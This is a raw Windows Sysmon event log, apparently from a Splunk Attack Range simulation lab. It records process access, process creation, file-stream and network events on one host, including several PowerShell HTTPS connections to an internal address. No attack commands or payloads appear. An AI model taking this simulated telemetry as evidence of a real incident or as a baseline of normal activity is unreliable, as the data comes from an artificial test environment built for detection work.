15:04:04.062{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343272Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.062{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343271Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.062{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343270Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.062{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-73E4-613B-53B4-03000000C801}6320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343269Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.062{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73E4-613B-53B4-03000000C801}6320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343268Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:04.041{B81B27B7-73E4-613B-53B4-03000000C801}6320C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343289Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:05.439{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=66241FA169EFFAC1837616C09D1BF873,SHA256=FE424942369A764F092F98F10F2C617D2EC10C0BB3CFC23BAC68579DF7123084,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343288Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:05.161{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=41E07E5E25DA8E0FF8F371AEC058147C,SHA256=9C4F703F6B4CDC1555D39B2FE7EE4F8D16E5B1E8D629E6A37A4E7ADEFB692ACD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343287Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:05.060{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=163DBBD844B6B92945DA8715514A023A,SHA256=B5C0017E17B64558E7A6279F2C1A3DB215D2F8A573DE54E3802CC237169C8267,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343286Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:05.059{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=02E29A3A56F15FDDB34374705CA79349,SHA256=80558D1C99092C58A27C501A5D76BCCC3F9B1341344C212CD4DB61E849754307,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343292Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:32.144{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52535-false10.0.1.12-8000- 354300x800000000000000035343291Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:31.086{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52534-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343290Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:06.459{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FD35D9D9619A4642C3EE3C00BC95F151,SHA256=20EAADC20F1B7FF7C0C7B43569B06F8A0850C309264D4334B6C455820ADBD3AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343293Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:07.475{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=847F652E6EBAF2B814E6BF6194B92937,SHA256=DDE3A07E5B6E02A7B73DB0A553A40A569199D972D953E086AE0949EF49FC7DB7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343294Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:08.489{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A2055897E3EB24FC618110E2887E9EC,SHA256=3184717BEB8D49852A9DD20143CBE2BAB18C3095ACE998C412DCE0ECCB9A73C7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343295Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:09.492{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B73217F088B582C6EAEBFAAD9AF0E7C,SHA256=ED6851BEBD6E755F687878DF56DBFD749976B76787B9433EBA206CD7513E4431,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343296Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:10.522{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8449D3ACCCD83A82AB3B1BE1845CA56C,SHA256=E3B868853BBDCC2B28C7E827F5B0A8EFC42B34E7A9FBF82DB87F0D04F702944F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343299Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:11.524{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B4BC609A43F31E03AB0EF3164A8C2744,SHA256=CCAE0B132A82E7F93189D6FF533B584372D7E02D76972ED191C89E90B414F9E7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343298Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:37.096{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52536-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343297Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:11.108{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=85F45E27C77209DBA44E918BC14E8095,SHA256=A7AB3149F8A55DE3BE4262BD73CB39D6E541CDA3079DDAF5BF1CB1292BA5CC42,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343301Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:12.538{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8939879D99535D60F7AAA76D373D2BF7,SHA256=3831E9393E3F4260BE1054C5CF3B38CBB1C267441BD8C492811E2B53FD593190,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343300Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:38.162{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52537-false10.0.1.12-8000- 23542300x800000000000000035343302Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:13.555{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BECF479ED6EED0119A26943A76BD00EF,SHA256=6FA77A82C74FBB5C50568118AB7CF02B01FF90E781945C2F809E5DDF0695256D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343303Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:14.589{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC52A29C05426B0FD4B7AC7068CBC6A7,SHA256=CCF7B5F899768A56AD1CE68EF7C39D07C1F33FB32C454D8DD774D9EC9E50645A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343306Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:15.653{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88697C4A27B6AF52FBCE58319B720F7A,SHA256=E19DDA7B3787FF9980C51AF713D7DBEFCD3D41377BB8E09BCD8988D7D57FD635,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343305Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:41.110{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52538-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035343304Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:15.155{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=2D88ED66A10B3D420F48EF3E5F3263E5,SHA256=F017949A0E604838707F29BA1C878613C85A0B4C810104C48FAB4F9A5F5DE43B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035343307Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:16.671{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64EC4451EB6303670E9AC3A466D69FA5,SHA256=24C97E16CD607AA859450FD246A1A3EAF268B5A67CA365A3B35D0C55302DC6CC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035343326Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:43.176{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52539-false10.0.1.12-8000- 10341000x800000000000000035343325Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.933{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73F1-613B-56B4-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343324Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.933{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343323Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.933{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343322Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.933{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343321Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.933{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343320Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.933{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-73F1-613B-56B4-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035343319Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.933{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-73F1-613B-56B4-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035343318Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.918{B81B27B7-73F1-613B-56B4-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035343317Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.686{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=192D2000156718EE6DCA2D8F27EDC07E,SHA256=CEA9FF6B75892ED4677BD732E196303853E1A58304D095AA9042A27A13BF3A9A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035343316Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.455{B81B27B7-73F1-613B-55B4-03000000C801}5044900C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343315Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 15:04:17.255{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-73F1-613B-55B4-03000000C801}504C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035343314Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 